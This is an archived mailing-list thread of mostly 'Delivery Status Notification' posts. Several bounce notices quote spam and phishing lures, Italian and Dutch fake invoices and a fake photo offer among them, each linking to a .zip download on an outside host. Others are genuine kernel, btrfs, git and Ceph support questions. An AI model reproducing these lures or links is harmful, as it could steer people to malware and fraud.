From: Mail Delivery System @ 2014-02-21  8:31 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 255 bytes --]

The following message to <stevetingle-IWqWACnzNjwqdlJmJB21zg@public.gmane.org> was undeliverable.
The reason for the problem:
5.1.0 - Unknown address error 550-'RCPT TO:<stevetingle-IWqWACnzNjwqdlJmJB21zg@public.gmane.org> Mailbox disk quota exceeded'

[-- Attachment #1.2: Type: message/delivery-status, Size: 385 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2147 bytes --]

From: <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <stevethorpe.za-IWqWACnzNjwqdlJmJB21zg@public.gmane.org>
Subject: Request profile
Date: Fri, 21 Feb 2014 06:46:53 +0100
Message-ID: <75321115.71933595701346-pywm/YdjYMHhNd1XINWLZXQ5xPRZif3c@public.gmane.org>

Content-type text/plain charset= iso-8859-1
Content-Transfer-Encoding: 8bit



Hello,

The answer to your request about profile consultation on ours the Web to page of 09.02.2014.
Statistics is enclosed in archive, we will be glad to cooperate in the future.
http://images.topguncustomz.com/inddex.html?OTyB1MQ9WXg2Gmzb5ZX



Thanks,

 
Tony Caruso
Consult Adviser
Union Consult Group
Tel.: +44 20 68605829



[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
       [not found] ` <047d7b86e7727b700204ea828c1d@google.com>
@ 2013-11-06 14:06   ` Matthew Minter
  0 siblings, 0 replies; 183+ messages in thread
From: Matthew Minter @ 2013-11-06 14:06 UTC (permalink / raw)
  To: linux-arm-kernel

Hi Everyone,

I am sorry for the exceedingly long delay before replying, I have had
a number of unrelated problems which have prevented me from working on
this issue.

The version of u-boot which caused this issue was Marvell's Q2-2013
release. I used this with a 3.12 rc1 and a 3.12 rc3 kernel, both
receiving the errors I have mentioned above. I have ensured my low
level debugging configuration is correct, it is indeed mapped
correctly to the new register range and I do not believe this to be
the problem, particularly as it crashes well after the early printk
has begun giving output.

Unfortunately I cannot find the log file from the kernel at this stage
as it appears to have been filled and overwritten, I however did look
into this further and Marvell have (since when I raised the problem)
given me a patched u-boot which is no longer causing the issue (the
patch seems to be dated mid October 2013), unfortunately I cant post
the change log of the patch but it does appear the problem was caused
by a buggy u-boot release (or at least that it is fixed with the
patched version). I have since tested the new version with kernels
3.12 rc3 to 3.12 rc6 and none of them have any issues with booting.
Here is a full diff of the change I made to the device tree file (dont
mind the bogus timestamps)

--- arch/arm/boot/dts/armada-xp-gp.dts.old    2013-11-06
13:39:17.440000000 +0000
+++ arch/arm/boot/dts/armada-xp-gp.dts    2013-11-05 17:32:16.160001348 +0000
@@ -39,7 +39,7 @@
     };

     soc {
-        ranges = <MBUS_ID(0xf0, 0x01) 0 0 0xd0000000 0x100000
+        ranges = <MBUS_ID(0xf0, 0x01) 0 0 0xf1000000 0x100000

               MBUS_ID(0x01, 0x1d) 0 0 0xfff00000 0x100000
               MBUS_ID(0x01, 0x2f) 0 0 0xf0000000 0x1000000>;

I think the issue therefore may not be a kernel issue after all and
should likely not be worried about. However on a related matter, I had
thought the kernel was supposed to have some kind of detection for the
register location using cp15? Why does the device tree describe the
register address staticly if this is the case?

Ultimately I think the specific errors I was getting (along with the
exact error being variable dependant on seemingly random factors) made
the specific errors a red herring and the problem was due to a faulty
initialisation by the bootloader. However if there is any other
information I can give or if anyone is interested I may be able to
find out more.

Best regards,
Matthew

On 6 November 2013 13:58, Mail Delivery Subsystem
<mailer-daemon@googlemail.com> wrote:
> Delivery to the following recipient failed permanently:
>
>      linux-arm-kernel at lists.infradead.org
>
> Technical details of permanent failure:
> Google tried to deliver your message, but it was rejected by the server for the recipient domain lists.infradead.org by merlin.infradead.org. [205.233.59.134].
>
> The error that the other server returned was:
> 550-Mailing lists do not accept HTML mail. See
> 550 http://david.woodhou.se/email.html
>
> ----- Original message -----
>
> X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
>         d=1e100.net; s=20130820;
>         h=x-gm-message-state:mime-version:in-reply-to:references:date
>          :message-id:subject:from:to:content-type;
>         bh=7ZxkcjMOgG2fPbDIq0WtE/eu/1H9O3KEeGtX4g0cEwc=;
>         b=dxwtJYHC5DNmtLbRqHF3nOw7L6jPlkQeYBV0Lu3X+NUD50WrnLJq4LaaA3Xc8p9ZdE
>          iq9axkL33lyu7+YL41iDM+uyXrVXdGfSevUw7VKm3LemgC6aVUM8Cjv9LTJIanncySaJ
>          nlgy2K1dGUEfQffHqC3hoZp5RqCudW4JtRBGCEkkwcRZPxD4ygh09XGeJlXkciZ5xwou
>          7bBwPY1TrEqsnbMvZNW59OS6NMjePvRi4NlSSG62w7p1sbes4NnTZrzCWYKNEg0JSmdc
>          jpkoy04IypB54+95FyGFZzUOu3V3XKeTC2AvU9I/o8imwCVxcaW8hwaQ25er+ETEgWU9
>          DK9Q==
> X-Gm-Message-State: ALoCoQmHzfdGMpqQ7DTvrzz4hpObpdipXgf2lGK+1cbRTSUyoaRE9sz7r32vzDU4Dsf3MuyWtioe7lnz0x3W8va3BaN2qtW/4g1vpApNOlp2FOxktOlZoZfYLfTcDRAkcCTofZ7ZrhLE
> MIME-Version: 1.0
> X-Received: by 10.66.159.234 with SMTP id xf10mr3984291pab.139.1383746298406;
>  Wed, 06 Nov 2013 05:58:18 -0800 (PST)
> Received: by 10.68.193.138 with HTTP; Wed, 6 Nov 2013 05:58:18 -0800 (PST)
> In-Reply-To: <20131022181141.3f567273@skate>
> References: <CAFJTrDtznkpwi76yyEKYvjuo+XV34ky9AOe8Qfa5wm-uHDJT6A@mail.gmail.com>
>         <20131021174339.GA27284@localhost>
>         <20131021184219.GA24520@titan.lakedaemon.net>
>         <20131022152950.40171b36@skate>
>         <CAFJTrDtKw0ANh55Y6xQtFzGtvmZOJ-ZC6cFuKV62L0tmmhT3uA@mail.gmail.com>
>         <20131022181141.3f567273@skate>
> Date: Wed, 6 Nov 2013 13:58:18 +0000
> Message-ID: <CAFJTrDsaq-NjLhcwHBuN1Q_zu-Q-yJkWLMUER1zVzc1=AFNM=Q@mail.gmail.com>
> Subject: Re: Armada XP Internal registers
> From: Matthew Minter <matthew_minter@xyratex.com>
> To: Thomas Petazzoni <thomas.petazzoni@free-electrons.com>,
>         Jason Cooper <jason@lakedaemon.net>, Ezequiel Garcia <ezequiel.garcia@free-electrons.com>,
>         linux-arm-kernel at lists.infradead.org
> Content-Type: multipart/alternative; boundary=047d7b86e7729390ac04ea828a5b
>
> Hi Everyone,
>
> I am sorry for the exceedingly long delay before replying, I have had a
> number of unrelated problems which have prevented me from working on this
> issue.
>
> The version of u-boot which caused this issue was Marvell's Q2-2013
> release. I used this with a 3.12 rc1 and a 3.12 rc3 kernel, both receiving
> the errors I have mentioned above. I have ensured my low level debugging
> configuration is correct, it is indeed mapped correctly to the new register
> range and I do not believe this to be the problem, particularly as it
> crashes well after the early printk has begun giving output.
>
> Unfortunately I cannot find the log file from the kernel at this stage as
> it appears to have been filled and overwritten, I however did look into
> this further and Marvell have (since when I raised the problem) given me a
> patched u-boot which is no longer causing the issue (the patch seems to be
> dated mid October 2013), unfortunately I cant post the change log of the
> patch but it does appear the problem was caused by a buggy u-boot release
> (or at least that it is fixed with the patched version). I have since
> tested the new version with kernels 3.12 rc3 to 3.12 rc6 and none of them
> have any issues with booting. Here is a full diff of the change I made to
> the device tree file (dont mind the bogus timestamps)
>
> --- arch/arm/boot/dts/armada-xp-gp.dts.old    2013-11-06 13:39:17.440000000
> +0000
> +++ arch/arm/boot/dts/armada-xp-gp.dts    2013-11-05 17:32:16.160001348
> +0000
> @@ -39,7 +39,7 @@
>      };
>
>      soc {
> -        ranges = <MBUS_ID(0xf0, 0x01) 0 0 0xd0000000 0x100000
> +        ranges = <MBUS_ID(0xf0, 0x01) 0 0 0xf1000000 0x100000
>                MBUS_ID(0x01, 0x1d) 0 0 0xfff00000 0x100000
>                MBUS_ID(0x01, 0x2f) 0 0 0xf0000000 0x1000000>;
>
> I think the issue therefore may not be a kernel issue after all and should
> likely not be worried about. However on a related matter, I had thought the
> kernel was supposed to have some kind of detection for the register
>
> ----- Message truncated -----
>

-- 


------------------------------
For additional information including the registered office and the treatment of Xyratex confidential information please visit www.xyratex.com

------------------------------

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <047d7b86daaa49592f04e3146f9d@google.com>
@ 2013-08-04  0:51   ` Jesper Utoft
  0 siblings, 0 replies; 183+ messages in thread
From: Jesper Utoft @ 2013-08-04  0:51 UTC (permalink / raw)
  To: linux-btrfs

Hello everybody.

I have run into serious trouble with my btrfs volume.

As an example after adding two disks to a btrfs volume they show up as
filled with data in btrfs filesystem show.

In btrfs fi df /mnt it says
Data RAID1: total=4.64TB, used=11.46TB
System.. (total > used so i think it is fine)
Metadata, Rid1: total=9.00GB, used=18.33GB

Obviously something have gone wrong
I have currently no idea on what to do.
I have tried running btrfsck but that didn't do anything.

The system i ubuntu 13.04 live cd kernel 3.8.0-19.

I have had trouble booting this server for a day's time, i end up in
initramfs with a mount issue.

Have anybody heard about something like this.
Please point me in the right direction :)

Thank you very much.
Cheers Jesper

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2013-06-11 18:09 postmaster-2WHbO6Ght55OhR2lhbcafA
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-2WHbO6Ght55OhR2lhbcafA @ 2013-06-11 18:09 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 184 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       up_siracusa-seN9vMpxCZMxEBhlWKYUM/EdO8xhY06T@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 311 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 1272 bytes --]

From: "Till" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <up_siracusa-seN9vMpxCZMxEBhlWKYUM/EdO8xhY06T@public.gmane.org>
Subject: Re: Re: Re: questa sono io.
Date: Tue, 11 Jun 2013 13:09:27 -0500
Message-ID: <002201ce66ce$ce413880$0200a8c0-9NVg08UUqdtXQo6UOAG+zEQPpUzl53L3@public.gmane.org>



Hello, up_siracusa.

Thursday, June 02, 2013, 9:56:25 PM, you wrote:

>>> Ecco le foto promesse cattura)
>>> Sono solo un po 'gelsi nudo :)
>>> http://capricorndreams.com/IMG00806.zip

-- 
Best regards,




[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2013-03-27  9:54 postmaster-ohsCnglPHPkmHH771XGohA
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-ohsCnglPHPkmHH771XGohA @ 2013-03-27  9:54 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 169 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       pasini-nssL4BiUmrkmHH771XGohA@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 322 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2418 bytes --]

From: "Supportpay" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <pasini-nssL4BiUmrkmHH771XGohA@public.gmane.org>
Subject: Re: document 85632752
Date: Wed, 27 Mar 2013 05:54:41 -0400
Message-ID: <10471412.63372354523816-tZDOFUKzIplqFZ3NbRY2NA@public.gmane.org>


   
Buongiorno,      
Fattura       
http://50.63.190.129/Descrizione/Annullamento.zip?r50FrFaOh7g2yshRra=pasini-nssL4BiUmrkmHH771XGohA@public.gmane.org




[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2013-03-26 23:07 postmaster-ERNa7u4uiwD/PTVKMIaDyQ
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-ERNa7u4uiwD/PTVKMIaDyQ @ 2013-03-26 23:07 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 180 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       annamaria.fiacchi-yViCv/G/lLC34Msakav8EA@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 360 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2328 bytes --]

From: "I" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <annamaria.fiacchi-yViCv/G/lLC34Msakav8EA@public.gmane.org>
Subject: Re[2]: Monte Biz
Date: Tue, 26 Mar 2013 19:05:55 -0400
Message-ID: <9226352787.62197566888107-tZDOFUKzIplqFZ3NbRY2NA@public.gmane.org>


     
Gentile,    
Fattura          
http://FIOREENATURA.COM.MX/Annullamento/Annullamento.zip




[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2013-03-14 22:12     ` Junio C Hamano
@ 2013-03-14 23:36       ` Harring Figueiredo
  0 siblings, 0 replies; 183+ messages in thread
From: Harring Figueiredo @ 2013-03-14 23:36 UTC (permalink / raw)
  To: Junio C Hamano; +Cc: git

Got it!

From the recommended site:

--
In the English singular case, the number – always 1 – can be replaced
with "one":

          printf (ngettext ("One file removed", "%d files removed", n), n);
This works because the ‘printf’ function discards excess arguments
that are not consumed by the format string.
--

Junio, thank you so much for the  reply and link to the docs.

-hff

On Thu, Mar 14, 2013 at 6:12 PM, Junio C Hamano <gitster@pobox.com> wrote:
> Harring Figueiredo <harringf@gmail.com> writes:
>
>>  Just want to confirm that this is not a bug:
>> ...
>>   printf_ln(Q_("The bundle requires this ref",
>>                                       "The bundle requires these %d refs",
>>                                       r->nr),
>>                                    r->nr);
>> ...
>>  seems to be missing %d parameter on the first message.
>
> Perhaps visit
>
>         http://www.gnu.org/software/gettext/manual/gettext.html#Plural-forms
>
> look for "In the English singular case,..." and read the
> explanation there?
>

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2013-03-14 22:01   ` Harring Figueiredo
@ 2013-03-14 22:12     ` Junio C Hamano
  2013-03-14 23:36       ` Harring Figueiredo
  0 siblings, 1 reply; 183+ messages in thread
From: Junio C Hamano @ 2013-03-14 22:12 UTC (permalink / raw)
  To: Harring Figueiredo; +Cc: git

Harring Figueiredo <harringf@gmail.com> writes:

>  Just want to confirm that this is not a bug:
> ...
>   printf_ln(Q_("The bundle requires this ref",
>                                       "The bundle requires these %d refs",
>                                       r->nr),
>                                    r->nr);
> ...
>  seems to be missing %d parameter on the first message.

Perhaps visit

	http://www.gnu.org/software/gettext/manual/gettext.html#Plural-forms

look for "In the English singular case,..." and read the
explanation there?

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <bcaec5396b50ba47be04d7e99955@google.com>
@ 2013-03-14 22:01   ` Harring Figueiredo
  2013-03-14 22:12     ` Junio C Hamano
  0 siblings, 1 reply; 183+ messages in thread
From: Harring Figueiredo @ 2013-03-14 22:01 UTC (permalink / raw)
  To: git

Hello folks,


 Just want to confirm that this is not a bug:

 <code>
 bunde.c: 443

  printf_ln(Q_("The bundle requires this ref",
                                      "The bundle requires these %d refs",
                                      r->nr),
                                   r->nr);

 </code>

 seems to be missing %d parameter on the first message.
 Please let me know if this is a bug or if it indeed should be like this.

 I am not a expert on gettext :-(

 Thank you!
 -hff

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2012-10-29  9:27     ` hemant surale
@ 2012-10-29 20:19       ` Dan Mick
  0 siblings, 0 replies; 183+ messages in thread
From: Dan Mick @ 2012-10-29 20:19 UTC (permalink / raw)
  To: hemant surale; +Cc: ceph-devel

Last time you asked this, I responded (on 18 Oct):

So, clearly something went wrong with the installation step, and this 
file was not created.  How did you install after building?

On 10/29/2012 02:27 AM, hemant surale wrote:
> Hi Folks ,
>
> I have executed all required steps to build Ceph from source but now
> when I execute "service Ceph start" it shows
>
> ---------------------------------------//Error--------------------------------------------
> root@atish-virtual-machine:/ceph_data# service ceph start
> /etc/init.d/ceph: 37: .: Can't open /usr/lib/ceph/ceph_common.sh
> -------------------------------------------------------------------------------------------
>
>
> Please help me out .

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
  2012-10-18 11:19   ` hemant surale
@ 2012-10-29  9:27     ` hemant surale
  2012-10-29 20:19       ` Dan Mick
  0 siblings, 1 reply; 183+ messages in thread
From: hemant surale @ 2012-10-29  9:27 UTC (permalink / raw)
  To: ceph-devel

Hi Folks ,

I have executed all required steps to build Ceph from source but now
when I execute "service Ceph start" it shows

---------------------------------------//Error--------------------------------------------
root@atish-virtual-machine:/ceph_data# service ceph start
/etc/init.d/ceph: 37: .: Can't open /usr/lib/ceph/ceph_common.sh
-------------------------------------------------------------------------------------------


Please help me out .


-
Hemant Surale

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-10-29  7:02 Mail Delivery Subsystem
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery Subsystem @ 2012-10-29  7:02 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA

Delivery to the following recipient failed permanently:

     ostia-aMngTBgqPTSgTcNt/0vsOQ@public.gmane.org

Technical details of permanent failure: 
Message rejected by Google Groups. Please visit http://mail.google.com/support/bin/answer.py?hl=en&answer=188131 to review our Bulk Email Senders Guidelines.

----- Original message -----

Received: by 10.50.222.226 with SMTP id qp2mr8550735igc.74.1351494140642;
        Mon, 29 Oct 2012 00:02:20 -0700 (PDT)
Received: by 10.50.222.226 with SMTP id qp2mr8550734igc.74.1351494140630;
        Mon, 29 Oct 2012 00:02:20 -0700 (PDT)
Return-Path: <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
Received: from stable.skadate.com (204-232-203-173.static.cloud-ips.com. [204.232.203.173])
        by mx.google.com with ESMTP id dd5si5496510igc.2.2012.10.29.00.02.20;
        Mon, 29 Oct 2012 00:02:20 -0700 (PDT)
Received-SPF: fail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 204.232.203.173 as permitted sender) client-ip=204.232.203.173;
Authentication-Results: mx.google.com; spf=hardfail (google.com: domain of containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org does not designate 204.232.203.173 as permitted sender) smtp.mail=containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
Received: from stable.skadate.com (IOM-91-34 [204.232.203.173])
	by stable.skadate.com (mailer) with SMTP id B4RirKGU29l
	for <ostia-aMngTBgqPTSgTcNt/0vsOQ@public.gmane.org>; Mon, 29 Oct 2012 03:02:19 -0400
Date: Mon, 29 Oct 2012 03:02:19 -0400
From: "Invoice" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <ostia-aMngTBgqPTSgTcNt/0vsOQ@public.gmane.org>
Subject: Rimesse Doc!
Message-Id: <mJ9d6nYV.zQTrjytu2Kduft-zG8VedLtfVgFkAtD/aG2mdBPR1lH4CV8@public.gmane.org>
MIME-Version: 1.0
Content-Type: text/plain;
 charset="UTF-8"
Content-Transfer-Encoding: 8bit




Buongiorno, 

Si prega di confermare il 20% tt pagamento anticipato.
nei confronti della fattura proforma PO01020/2012
http://studioabsnc.it/Pagamento.zip

Aspetto la tua risposta

Cordiali saluti

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-10-24  4:28 postmaster-xqsl9BtirPbEI5Av7rMDOw
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-xqsl9BtirPbEI5Av7rMDOw @ 2012-10-24  4:28 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 166 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       ggi-xqsl9BtirPbEI5Av7rMDOw@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 236 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 2270 bytes --]

From: "Consult2 " <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <ggi-xqsl9BtirPbEI5Av7rMDOw@public.gmane.org>
Subject: Re[2]: variazioni nel conto!
Date: Wed, 24 Oct 2012 09:58:46 +0530
Message-ID: <bbCcERf4.Uw7TSgSUHnD5k2-9/shz0SragYGAi9D+dwHKF7F/SLMIK8YAL8bYrjMMd8@public.gmane.org>



Gentile utente, 


L'aggiornamento di configurazione
http://69.195.95.169/Ordine.zip


tWqI9StM = id.




[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <f46d0438909985742c04cc3f658c@google.com>
@ 2012-10-18 11:19   ` hemant surale
  2012-10-29  9:27     ` hemant surale
  0 siblings, 1 reply; 183+ messages in thread
From: hemant surale @ 2012-10-18 11:19 UTC (permalink / raw)
  To: ceph-devel

I have executed all required steps to build Ceph from source but now
when I execute "service Ceph start" it shows

------------------------------
---------//Error--------------------------------------------
root@atish-virtual-machine:/ceph_data# service ceph start
/etc/init.d/ceph: 37: .: Can't open /usr/lib/ceph/ceph_common.sh
-------------------------------------------------------------------------------------------


Please help me out .


-
Hemant Surale

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Re: Delivery Status Notification (Failure)
       [not found] ` <e89a8f235453a906b704c472eacd@google.com>
@ 2012-07-17 11:09   ` Chen
  0 siblings, 0 replies; 183+ messages in thread
From: Chen @ 2012-07-17 11:09 UTC (permalink / raw)
  To: linux-kernel

Give up this stuff then.
It has gone into a wrong way. :-/

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-04-11 13:24 postmaster-dK7EesNU6FY
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-dK7EesNU6FY @ 2012-04-11 13:24 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 310 bytes --]

This is an automatically generated Delivery Status Notification.

Delivery to the following recipients failed.

       conferencesdd-dK7EesNU6FY@public.gmane.org
       corona-dK7EesNU6FY@public.gmane.org
       coronacorona-dK7EesNU6FY@public.gmane.org
       counciluhlenbeek-dK7EesNU6FY@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 501 bytes --]

[-- Attachment #1.3: Type: message/rfc822, Size: 898 bytes --]

From: <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To: <conferencesdd-dK7EesNU6FY@public.gmane.org>
Subject: Re: prijslijst
Date: Wed, 11 Apr 2012 14:24:26 +0100
Message-ID: <007501cd17e6$694a3400$6489a8c0-P1IqAXsvF9WDs0zCBJ1y4Q@public.gmane.org>



>> Stuur-to-date prijslijst kunt u

Hello.
U kunt de
http://kadinvekariyer.com/downloadnl/Info.zip




[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-04-11 13:08 postmaster-86/RSF40sML81It4hiB8CFo/9dUJfHaYQQ4Iyu8u01E
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-86/RSF40sML81It4hiB8CFo/9dUJfHaYQQ4Iyu8u01E @ 2012-04-11 13:08 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 538 bytes --]

This is an automatically generated Delivery Status Notification.

Unable to deliver message to the following recipients, because the message was forwarded more than the maximum allowed times. This could indicate a mail loop.

       bmhm-AF5Kt5BC0Ryq1z4C/xg42WZHpeb/A1Y/@public.gmane.org
       bzj-AF5Kt5BC0Ryq1z4C/xg42WZHpeb/A1Y/@public.gmane.org
       ctzr-AF5Kt5BC0Ryq1z4C/xg42WZHpeb/A1Y/@public.gmane.org
       dimx-AF5Kt5BC0Ryq1z4C/xg42WZHpeb/A1Y/@public.gmane.org
       ecxb-AF5Kt5BC0Ryq1z4C/xg42WZHpeb/A1Y/@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 691 bytes --]

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1.3: Type: text/rfc822-headers, Size: 260 bytes --]

From:  "devnull" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To:  <bmhm-AF5Kt5BC0Ryq1z4C/xg42WZHpeb/A1Y/@public.gmane.org>
Message-ID:  <33936278.36077089387934-P1IqAXsvF9WDs0zCBJ1y4Q@public.gmane.org>
Subject:  [SPAM]  verzoek.


[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-04-11 13:04 postmaster-86/RSF40sMJNBHnkq6ukOFo/9dUJfHaYQQ4Iyu8u01E
  0 siblings, 0 replies; 183+ messages in thread
From: postmaster-86/RSF40sMJNBHnkq6ukOFo/9dUJfHaYQQ4Iyu8u01E @ 2012-04-11 13:04 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 538 bytes --]

This is an automatically generated Delivery Status Notification.

Unable to deliver message to the following recipients, because the message was forwarded more than the maximum allowed times. This could indicate a mail loop.

       bmhm-AF5Kt5BC0Ryq1z4C/xg42WZHpeb/A1Y/@public.gmane.org
       bzj-AF5Kt5BC0Ryq1z4C/xg42WZHpeb/A1Y/@public.gmane.org
       ctzr-AF5Kt5BC0Ryq1z4C/xg42WZHpeb/A1Y/@public.gmane.org
       dimx-AF5Kt5BC0Ryq1z4C/xg42WZHpeb/A1Y/@public.gmane.org
       ecxb-AF5Kt5BC0Ryq1z4C/xg42WZHpeb/A1Y/@public.gmane.org




[-- Attachment #1.2: Type: message/delivery-status, Size: 691 bytes --]

[-- Warning: decoded text below may be mangled, UTF-8 assumed --]
[-- Attachment #1.3: Type: text/rfc822-headers, Size: 260 bytes --]

From:  "devnull" <containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org>
To:  <bmhm-AF5Kt5BC0Ryq1z4C/xg42WZHpeb/A1Y/@public.gmane.org>
Message-ID:  <33936278.36077089387934-P1IqAXsvF9WDs0zCBJ1y4Q@public.gmane.org>
Subject:  [SPAM]  verzoek.


[-- Attachment #2: Type: text/plain, Size: 205 bytes --]

_______________________________________________
Containers mailing list
Containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA@public.gmane.org
https://lists.linuxfoundation.org/mailman/listinfo/containers

^ permalink raw reply	[flat|nested] 183+ messages in thread

* Delivery Status Notification (Failure)
@ 2012-04-09  7:38 Mail Delivery System
  0 siblings, 0 replies; 183+ messages in thread
From: Mail Delivery System @ 2012-04-09  7:38 UTC (permalink / raw)
  To: containers-cunTk1MwBs9QetFLy7KEm3xJsTq8ys+cHZ5vskTnxNA


[-- Attachment #1.1: Type: text/plain, Size: 206 bytes --]

